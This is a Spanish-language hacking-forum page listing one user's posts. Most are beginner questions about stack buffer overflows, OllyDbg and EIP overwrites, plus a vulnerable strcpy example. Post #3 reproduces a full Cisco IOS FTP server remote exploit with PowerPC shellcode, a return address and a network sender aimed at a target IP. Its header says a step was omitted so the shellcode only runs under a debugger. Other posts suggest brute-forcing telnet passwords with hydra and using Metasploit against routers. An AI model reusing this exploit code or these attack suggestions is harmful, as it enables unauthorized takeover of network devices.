Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Jarmen Kell

#1
no se me ocurre nada, lo mismo puedes sacar la pass de telnet con hydra.... no lo he probado
#2
me extraña que no esté abierto el puerto 21...
#3
/*

Cisco IOS FTP server remote exploit by Andy Davis 2008               
                                                                     
Cisco Advisory ID: cisco-sa-20070509-iosftp - May 2007               
                                                                     
Specific hard-coded addresses for IOS 12.3(18) on a 2621XM router   
                                                                     
Removes the requirement to authenticate and escalates to level 15   
                                                                     
*********************************************************************
To protect the innocent a critical step has been omitted, which means
the shellcode will only execute when the router is attached to gdb. 
I'm sure the PowerPC shellcoders out there will work it out...       
*********************************************************************
                                                                     
Thanks to Gyan Chawdhary and Varun Uppal for all the hours they spent
on the original IOS security research                               
                                                                     
iosftpexploit <at> googlemail 'dot' com                             

*/

#include <sys/socket.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>

#define PORT 21

int main(int argc, char **argv)
{
unsigned char sendbuf[] =

"MKD "

/* .equ vty_info, 0x8182da60    # pointer to VTY info */
/* .equ terminate, 0x80e4086c   # kill a process */

"\x3c\x80\x81\x83"      /* lis     4,vty_info@ha */
"\x38\x84\xda\x60"      /* la      4,vty_info@l(4) */
"\x7d\x08\x42\x78"      /* xor     8,8,8 */
"\x7c\xe4\x40\x2e"      /* lwzx    7,4,8 */
"\x91\x07\x01\x74"      /* stw     8,372(7) */
"\x39\x08\xff\xff"      /* subi    8,8,1 */
"\x38\xe7\x09\x1a"      /* addi    7,7,233 */
"\x91\x07\x04\xca"      /* stw     8,1226(7) */
"\x7d\x03\x43\x78"      /* mr      3,8 */
"\x3c\x80\x80\xe4"      /* lis     4,terminate@ha */
"\x38\x84\x08\x6c"      /* la      4,terminate@l(4) */
"\x7c\x89\x03\xa6"      /* mtctr   4 */
"\x4e\x80\x04\x20"      /* bctr    */

/* exists cleanly without adversely affecting the FTP server */

"\x61\x61\x61\x61"      /* padding */
"\x61\x61\x61\x61"      /* padding */
"\x61\x61\x61\x61"      /* padding */
"\x61\x61\x61\x61"      /* padding */
"\x61\x61\x61\x61"      /* padding */
"\x61\x61\x61\x61"      /* padding */

"\x80\x06\x23\xB8"      /* return address */
"\x0d\x0a";

/* trampoline code */
/* when the overflow occurs r26+0x14 points to the shellcode */
/*
0x800623B8      lwz     26, 20(26)
0x800623BC      mtctr   26
0x800623C0      mr      3, 27
0x800623C4      bctrl
*/

unsigned char recvbuf[256];
struct sockaddr_in servaddr;
int s;

if (argc != 2)
        {
        printf ("\nCisco IOS FTP server remote exploit by Andy Davis 2008\n");

        printf ("\nUsage: %s <target IP address>\n",argv[0]);
        exit(-1);
        }

servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = inet_addr(argv[1]);
servaddr.sin_port = htons(PORT);

s = socket(AF_INET, SOCK_STREAM, 0);
connect (s, (struct sockaddr *) &servaddr, sizeof(servaddr));
printf ("\nCisco IOS FTP server remote exploit by Andy Davis 2008\n");
printf ("Specific offsets for IOS 12.3(18) on a 2621XM router\n\n");
printf ("Sending exploit...\n\n");

if (send(s, sendbuf, sizeof(sendbuf)-1, 0) == 0)
        {
        printf("Error sending packet...quitting\n\n");
        exit (1);
        }
recv (s, recvbuf, sizeof(recvbuf)-1,0);
printf ("Now telnet to the router for a shell...\n\n");
}

// milw0rm.com [2008-07-29]
#4
prueba con algún exploit de metasploit, en backtrack hay mogollon de programas para cisco
#5
Bueno os dejo estas capturas de la salida de olly con el codigo del manual,
como deberia de interpretar esto?




#6
Os voy a poner unas cuantas cosas para no dar mucho la vara, supongo que esto también será de ayuda al resto que como yo esté empezando...

Supongamos que tengo un programa en mi equipo, instalado y todo, ej; emule

abro emule con olly y que hago le meto en argumento todas las AAAAAAA???

findjmp --> que tendria que buscar con el?

por mas que leo y leo no doy con la solucion a todas estas cosas, ando un poco perdido de tanto leer de varias paginas que alfinal acabo confundido

un saludo y muchas gracias
#7
pues ya te digo, en vista no se sobreescribe con AAAA.... el eip ni a tiros, eso si, el programa casca de lo lindo cuando le meto mil AAAAA xDD, iré haciendo algunas pruebas mas aver si saco algo,

gracias por contestar aún asi,

saludos y felices fiestas!!  :laugh:
#8
perdon, soy un inutil ajjaj, lo habia guardado como .c xDD duda resuelta, gracias!!




una cosita mas, esto funciona solo bajo xp?, lo stoy probando en vista y en el olly no se ve que sobreescriba la EIP....  :o

tambien tengo montado un xp x64 version, algun problema en las pruebas respecto a xp sp1 o sp2?

gracias
#9
Holaaaaa, bueno tengo una dudilla acabo de empezar con esto asique, sed amables ^^^^

bueno cuando cojo el dev-c++ compiler y compilo el primer código del tutorial me da un error en la linea

strcpy (buffer, argv[1]);


este es el codigo del tutorial:


#include <stdio.h>

int main (int argc, char **argv){
   
    char buffer[64];
    if (argc < 2){
             printf ("introduzca un argumento al programa\n");
             return 0;
    }
    strcpy (buffer, argv[1]);
    return 0;
}

y este es la notificación del error:

In function `int main(int, char**)':
`strcpy' undeclared (first use this function)
(Each undeclared identifier is reported only once for each function it apperars in.)
[build error] [jarmenkell.o] Error 1

:S:S:S:S ni idea, aver si me podeis hechar un cable,
un saludo gracias!!